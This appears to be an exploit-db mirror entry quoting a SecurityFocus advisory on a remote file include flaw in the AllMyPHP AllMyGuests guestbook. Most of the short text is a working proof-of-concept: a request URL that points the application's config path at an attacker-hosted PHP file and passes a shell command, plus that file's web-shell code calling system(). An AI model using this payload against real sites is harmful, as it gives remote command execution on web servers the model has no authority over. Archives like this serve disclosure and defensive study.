exploit-db-mirror/platforms/php/webapps/23697.txt
Offensive Security 16eeac4edf Updated 05_20_2014
2014-05-20 04:36:33 +00:00

13 lines
No EOL
646 B
Text
Executable file

source: http://www.securityfocus.com/bid/9664/info
Reportedly the AllMyPHP application AllMyGuests is prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call.
This issue may allow a remote attacker to execute arbitrary commands on the affected system with the privileges of the web server. Other attacks may be possible as well.
http://www.example.com/allmylinks/include/info.inc.php?_AMGconfig[cfg_serverpath]=http://www.example.org/attacker.php/&cmd=uname%20-a
www.example.org/attacker.php' will contain:
<?php
system("$cmd");
?>